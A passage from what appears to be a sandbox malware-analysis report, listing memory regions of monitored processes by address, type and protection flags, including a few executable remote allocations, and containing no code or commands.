page read and write
|
||
|
557E000
|
stack
|
page read and write
|
||
|
7FFD34736000
|
trusted library allocation
|
page read and write
|
||
|
AB2000
|
trusted library allocation
|
page read and write
|
||
|
400000
|
remote allocation
|
page execute and read and write
|
||
|
9E6000
|
heap
|
page read and write
|
||
|
20150F10000
|
heap
|
page read and write
|
||
|
BB1000
|
heap
|
page read and write
|
||
|
2898000
|
trusted library allocation
|
page read and write
|
||
|
2295B5C1000
|
heap
|
page read and write
|
||
|
2295CFE0000
|
heap
|
page read and write
|
||
|
7FFD348D0000
|
trusted library allocation
|
page read and write
|
||
|
286B000
|
trusted library allocation
|
page read and write
|
||
|
482817E000
|
stack
|
page read and write
|
||
|
2199059C000
|
trusted library allocation
|
page read and write
|
||
|
2199EF3F000
|
trusted library allocation
|
page read and write
|
||
|
28A3000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34930000
|
trusted library allocation
|
page read and write
|
||
|
2295CF6E000
|
heap
|
page read and write
|
||
|
2295D396000
|
heap
|
page read and write
|
||
|
27CE000
|
stack
|
page read and write
|
||
|
2014F127000
|
heap
|
page execute and read and write
|
||
|
2198CF40000
|
heap
|
page read and write
|
||
|
285D000
|
trusted library allocation
|
page read and write
|
||
|
21990AB1000
|
trusted library allocation
|
page read and write
|
||
|
2198F29C000
|
trusted library allocation
|
page read and write
|
||
|
28B9000
|
trusted library allocation
|
page read and write
|
||
|
2198FF37000
|
trusted library allocation
|
page read and write
|
||
|
5760000
|
heap
|
page read and write
|
||
|
2198D210000
|
trusted library allocation
|
page read and write
|
||
|
219A7604000
|
heap
|
page read and write
|
||
|
9EA9EFB000
|
stack
|
page read and write
|
||
|
7FFD34900000
|
trusted library allocation
|
page read and write
|
||
|
2198F2E1000
|
trusted library allocation
|
page read and write
|
||
|
5E0000
|
heap
|
page read and write
|
||
|
7FFD34900000
|
trusted library allocation
|
page read and write
|
||
|
2295B7D0000
|
heap
|
page read and write
|
||
|
2295CF11000
|
heap
|
page read and write
|
||
|
7FFD34890000
|
trusted library allocation
|
page read and write
|
||
|
2295B5C2000
|
heap
|
page read and write
|
||
|
28A7000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34970000
|
trusted library allocation
|
page read and write
|
||
|
20150ADA000
|
heap
|
page read and write
|
||
|
20151126000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34930000
|
trusted library allocation
|
page read and write
|
||
|
59AD000
|
stack
|
page read and write
|
||
|
9EA9CFE000
|
stack
|
page read and write
|
||
|
288A000
|
trusted library allocation
|
page read and write
|
||
|
2295CF6F000
|
heap
|
page read and write
|
||
|
2295CEE6000
|
heap
|
page read and write
|
||
|
7FFD34740000
|
trusted library allocation
|
page execute and read and write
|
||
|
48284B6000
|
stack
|
page read and write
|
||
|
2853000
|
trusted library allocation
|
page read and write
|
||
|
ECD000
|
stack
|
page read and write
|
||
|
20150A40000
|
heap
|
page execute and read and write
|
||
|
21990578000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34970000
|
trusted library allocation
|
page read and write
|
||
|
48281FC000
|
stack
|
page read and write
|
||
|
2295B5C4000
|
heap
|
page read and write
|
||
|
2014F080000
|
heap
|
page readonly
|
||
|
7FFD34880000
|
trusted library allocation
|
page read and write
|
||
|
7FFD349C0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD349B0000
|
trusted library allocation
|
page read and write
|
||
|
2014F050000
|
trusted library allocation
|
page read and write
|
||
|
286F000
|
trusted library allocation
|
page read and write
|
||
|
4DE4000
|
heap
|
page read and write
|
||
|
48280FE000
|
stack
|
page read and write
|
||
|
2295B5CE000
|
heap
|
page read and write
|
||
|
2014F010000
|
heap
|
page read and write
|
||
|
2295CF6E000
|
heap
|
page read and write
|
||
|
7FFD34683000
|
trusted library allocation
|
page execute and read and write
|
||
|
219A7124000
|
heap
|
page read and write
|
||
|
4DD3000
|
heap
|
page read and write
|
||
|
2295CF1F000
|
heap
|
page read and write
|
||
|
2198D02E000
|
heap
|
page read and write
|
||
|
2198F2DD000
|
trusted library allocation
|
page read and write
|
||
|
20150EAA000
|
heap
|
page read and write
|
||
|
2015160C000
|
trusted library allocation
|
page read and write
|
||
|
7FFD3468D000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD34980000
|
trusted library allocation
|
page read and write
|
||
|
48283F9000
|
stack
|
page read and write
|
||
|
2014EF37000
|
heap
|
page read and write
|
||
|
219A74C0000
|
heap
|
page read and write
|
||
|
2295CEFA000
|
heap
|
page read and write
|
||
|
28B1000
|
trusted library allocation
|
page read and write
|
||
|
7FFD3468D000
|
trusted library allocation
|
page execute and read and write
|
||
|
63CF000
|
stack
|
page read and write
|
||
|
A2E000
|
stack
|
page read and write
|
||
|
2295B7D5000
|
heap
|
page read and write
|
||
|
40E000
|
remote allocation
|
page execute and read and write
|
||
|
2295B5EB000
|
heap
|
page read and write
|
||
|
2014EF3D000
|
heap
|
page read and write
|
||
|
287A000
|
trusted library allocation
|
page read and write
|
||
|
2198D2C4000
|
heap
|
page read and write
|
||
|
7FFD34910000
|
trusted library allocation
|
page read and write
|
||
|
2014EFD0000
|
heap
|
page read and write
|
||
|
2199FEDC000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34A04000
|
trusted library allocation
|
page read and write
|
||
|
482843E000
|
stack
|
page read and write
|
||
|
7FFD3473C000
|
trusted library allocation
|
page execute and read and write
|
||
|
EE062BF000
|
stack
|
page read and write
|
||
|
2014EEB0000
|
heap
|
page read and write
|
||
|
2883000
|
trusted library allocation
|
page read and write
|
||
|
20150FE0000
|
heap
|
page read and write
|
||
|
2295CFC7000
|
heap
|
page read and write
|
||
|
EE0623E000
|
stack
|
page read and write
|
||
|
B96000
|
heap
|
page read and write
|
||
|
4827DCE000
|
stack
|
page read and write
|
||
|
AB7000
|
trusted library allocation
|
page execute and read and write
|
||
|
48285B8000
|
stack
|
page read and write
|
||
|
7FFD34831000
|
trusted library allocation
|
page read and write
|
||
|
EE06037000
|
stack
|
page read and write
|
||
|
7FFD34A10000
|
trusted library allocation
|
page read and write
|
||
|
2295CEE0000
|
heap
|
page read and write
|
||
|
2295B410000
|
heap
|
page read and write
|
||
|
7FFD3483A000
|
trusted library allocation
|
page read and write
|
||
|
219A7607000
|
heap
|
page read and write
|
||
|
2199F1BC000
|
trusted library allocation
|
page read and write
|
||
|
4DC2000
|
heap
|
page read and write
|
||
|
289F000
|
trusted library allocation
|
page read and write
|
||
|
7FFD3483A000
|
trusted library allocation
|
page read and write
|
||
|
2295B57E000
|
heap
|
page read and write
|
||
|
7FFD34680000
|
trusted library allocation
|
page read and write
|
||
|
2015110F000
|
trusted library allocation
|
page read and write
|
||
|
201513C0000
|
trusted library allocation
|
page read and write
|
||
|
20150EFD000
|
heap
|
page read and write
|
||
|
5BAC000
|
stack
|
page read and write
|
||
|
2198D04E000
|
heap
|
page read and write
|
||
|
7FFD34690000
|
trusted library allocation
|
page read and write
|
||
|
9EA99FE000
|
stack
|
page read and write
|
||
|
7FFD348F0000
|
trusted library allocation
|
page read and write
|
||
|
EE05CFF000
|
stack
|
page read and write
|
||
|
2198CF50000
|
heap
|
page read and write
|
||
|
DC7000
|
heap
|
page read and write
|
||
|
5AED000
|
stack
|
page read and write
|
||
|
4E02000
|
heap
|
page read and write
|
||
|
582D000
|
stack
|
page read and write
|
||
|
285B000
|
trusted library allocation
|
page read and write
|
||
|
AA6000
|
heap
|
page read and write
|
There are 490 hidden memdumps, click here to show them.